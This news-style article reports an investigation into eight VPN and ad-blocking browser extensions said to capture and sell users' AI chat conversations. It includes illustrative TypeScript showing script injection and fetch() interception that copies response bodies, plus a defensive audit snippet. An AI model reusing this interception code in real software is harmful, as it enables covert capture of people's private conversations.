Millions of users who rely on browser extensions for privacy and convenience have unknowingly exposed their most personal data, including full AI chat conversations, to hidden tracking systems. A recent investigation by cybersecurity firm Koi revealed that eight popular browser extensions—with a combined install base exceeding 8 million—are secretly collecting and selling AI chat interactions for marketing analytics. These findings highlight the widening cracks in browser ecosystem oversight and the deceptive practices lurking behind “free” online tools that promise privacy protection.
A Deep Breach of User Trust
According to Koi’s analysis, the extensions—available on both the Chrome Web Store and Microsoft Edge Add-ons—appear to perform legitimate functions such as VPN routing, ad blocking, and enhanced browsing security. Many even boast “Featured” badges, endorsements that typically signify compliance with Google and Microsoft quality standards. But behind the glossy veneer lies a sophisticated data-harvesting mechanism. The extensions inject specific “executor” scripts into web pages every time users access platforms such as ChatGPT, Claude, Gemini, Copilot, Grok, or Meta AI. These scripts override normal browser communication functions, capturing complete chat transcripts, timestamps, and platform details before sending the data to servers controlled by the developers.
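Koi has not published the extensions’ source, but the injection step it describes matches a common content-script pattern. The TypeScript sketch below shows one way such an “executor” could be planted in a page; the file name executor.js, the “executor-capture” channel marker, and the payload shape are illustrative assumptions, not recovered code.

```typescript
// content-script.ts — hypothetical sketch of the injection step: a content
// script plants a page-level "executor" script on AI chat sites and relays
// whatever it captures back to the extension. All names are assumptions.

// Inject the page-level script (under Manifest V3 it must be listed in the
// manifest's "web_accessible_resources" for the page to load it).
const executor = document.createElement("script");
executor.src = chrome.runtime.getURL("executor.js"); // hypothetical bundle
executor.onload = () => executor.remove();           // erase the visible trace
(document.head || document.documentElement).appendChild(executor);

// Relay captured payloads from the page context to the extension's backend.
window.addEventListener("message", (event: MessageEvent) => {
  if (event.source !== window) return;                    // same-page messages only
  if (event.data?.channel !== "executor-capture") return; // assumed marker
  chrome.runtime.sendMessage({ capture: event.data.payload });
});
```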
How the Invisible Harvest Works
The mechanism operates by intercepting browser networking APIs such as fetch() and XMLHttpRequest, diverting requests through a concealed data-collection layer. From there, the information—ranging from casual prompts to confidential questions—is compressed and transmitted to proprietary endpoints. Even when users disable the extensions’ visible functions, such as the VPN or ad blocking, the data collection continues uninterrupted. The only effective way to stop the harvesting, Koi emphasized, is to disable or uninstall the extensions entirely.
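To make the interception concrete, here is a minimal page-context sketch of the technique Koi describes: wrapping window.fetch so each response body can be copied before the page consumes it. The channel marker and payload fields are the same illustrative assumptions as in the sketch above; the extensions’ actual code has not been released.

```typescript
// executor.ts — minimal page-context sketch of fetch() interception. The
// wrapper clones every response so its body can be read without consuming
// the stream the page expects. All field names are hypothetical.
const originalFetch = window.fetch.bind(window);

window.fetch = async (...args: Parameters<typeof fetch>): Promise<Response> => {
  const response = await originalFetch(...args);
  const url = args[0] instanceof Request ? args[0].url : String(args[0]);

  // A real harvester would filter here for chat API endpoints.
  response.clone().text().then((body) => {
    window.postMessage({
      channel: "executor-capture", // assumed marker, matches the relay script
      payload: { url, timestamp: Date.now(), body }, // e.g. a full chat reply
    }, "*");
  }).catch(() => { /* ignore unreadable bodies in this sketch */ });

  return response;
};
```

XMLHttpRequest can be intercepted the same way, by overriding open() and send() on its prototype.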
The collected data includes:
– Prompts and responses for every AI chat interaction.
– Conversation identifiers and timestamps.
– Session metadata, platform, and model information.
– Additional browsing data associated with the session.
This comprehensive extraction effectively gives extension operators full visibility into user-generated dialogues, including sensitive material such as medical inquiries, legal advice, or financial details. In short, anyone using these extensions since mid-2025 should assume that their AI chat histories have been stored and shared for commercial profiling.
Tracking Begins with Urban VPN
Koi first pinpointed the data collection in the Urban VPN Proxy extension, a widely used free VPN service that advertises AI protection capabilities. The harvesting practice began with version 5.5.0, rolled out in early July 2025. Urban VPN claimed to scan AI prompts for personal details to “enhance safety,” but its code revealed extensive backend logging that far exceeded that description. Following this discovery, Koi identified seven more extensions operated by the same developer—Urban Cyber Security—with identical data collection patterns.
| Platform | Extension | Install Count |
|---|---|---|
| Chrome Web Store | Urban VPN Proxy | 6,000,000 |
| Chrome Web Store | 1ClickVPN Proxy | 600,000 |
| Chrome Web Store | Urban Browser Guard | 40,000 |
| Chrome Web Store | Urban Ad Blocker | 10,000 |
| Edge Add-ons | Urban VPN Proxy | 1,320,000 |
| Edge Add-ons | 1ClickVPN Proxy | 36,459 |
| Edge Add-ons | Urban Browser Guard | 12,624 |
| Edge Add-ons | Urban Ad Blocker | 6,476 |
Misleading Privacy Promises
The extensions come with privacy statements that seem reassuring at first glance. For example, Urban VPN lists “AI protection” as a benefit and even claims to check prompts for personal information or unsafe links. Deeper within its lengthy privacy policy, however, lies obscure language authorizing the collection of “prompts and outputs queried by the end-user or generated by the AI chat provider.” This disclosure, buried in a 6,000-word document, permits the shared data to be used for “marketing analytics purposes.” In effect, it gives developers permission to siphon users’ conversations without informed consent.
Urban Cyber Security, the company behind these tools, identifies BiScience as its affiliated data analysis partner. BiScience’s business model centers on transforming user data into “actionable market intelligence,” meaning that AI chats—potentially containing medical conditions, confidential code, or emotional confessions—are parsed, categorized, and monetized.
Corporate Silence and Oversight Failure
Given the glaring privacy violations, the presence of “Featured” badges points to a failure of due diligence by both Google and Microsoft. Neither company has provided a clear explanation of how these extensions met their review standards or why they remain publicly available. After multiple inquiries, Microsoft simply responded that it had nothing to “share,” while Google offered no comment at all. Developers and affiliated entities, including Urban Cyber Security and BiScience, also declined to reply to questions regarding their data collection practices.
Broader Implications for Online Privacy
The revelations expose a fundamental contradiction in how users perceive browser extensions: tools designed to protect privacy can also become powerful surveillance engines. Koi’s findings illustrate how casually users grant permissions to extensions that integrate deeply with web pages and APIs. Once granted, those permissions let an extension sidestep ordinary browser safeguards and carry out large-scale data exfiltration.
The discovery underscores the fragile nature of privacy when interacting with modern AI platforms. Many people use chatbots for conversations involving health, career, and personal identity — domains traditionally protected by strict confidentiality protocols. Yet, in the race for convenience, users are inadvertently pouring their digital lives into unsecured pipelines vulnerable to exploitation.
Lessons for Users and Developers
These findings serve as a clear warning to developers and consumers alike. Users can protect themselves by taking simple steps:
– Regularly audit installed browser extensions (see the diagnostic sketch after this list).
– Disable or uninstall tools that request excessive permissions.
– Verify developer credibility before installation.
– Avoid sharing sensitive information through AI chatbots unless explicitly protected by confidentiality policies.
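As a companion to the first item above, the following is a hedged TypeScript sketch of how a diagnostic extension holding Chrome’s “management” permission could enumerate installed extensions and flag the kind of broad host access these harvesters relied on. It illustrates the audit idea; it is not a tool referenced in Koi’s report.

```typescript
// audit.ts — hypothetical helper for a diagnostic extension that declares
// the "management" permission: list installed extensions and warn about any
// enabled extension that can read every site the user visits.
chrome.management.getAll((extensions) => {
  for (const ext of extensions) {
    const hosts = ext.hostPermissions ?? [];
    const canReadAllSites = hosts.some(
      (h) => h === "<all_urls>" || h.startsWith("*://*/"),
    );
    if (ext.enabled && canReadAllSites) {
      console.warn(`${ext.name} (${ext.id}) can read all sites:`, hosts);
    }
  }
});
```

Users without developer tooling can run the same check manually at chrome://extensions (or edge://extensions) by reviewing each entry’s site-access settings.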
For developers, transparency and ethical data governance should be foundational: clear disclosures, third-party audits, and minimal data collection are essential to rebuilding public trust eroded by deceptive design.
The Growing Need for Accountability
Koi’s discovery demonstrates how unchecked data-sharing practices can subvert user autonomy in ways few anticipate. The lines between privacy, advertising, and surveillance continue to blur as browser ecosystems prioritize visibility and feature promotion over verification. Whether Google and Microsoft will act decisively remains uncertain, but one thing is clear: the allure of “free” extensions often carries a hidden cost—paid not in dollars, but in the intimate details of users’ conversations and lives.
The scandal serves as a reminder that in today’s AI-driven world, digital safety begins not with software promises but with user skepticism. Every click, every chat, and every extension adds another layer to the invisible marketplace where online privacy is quietly traded away.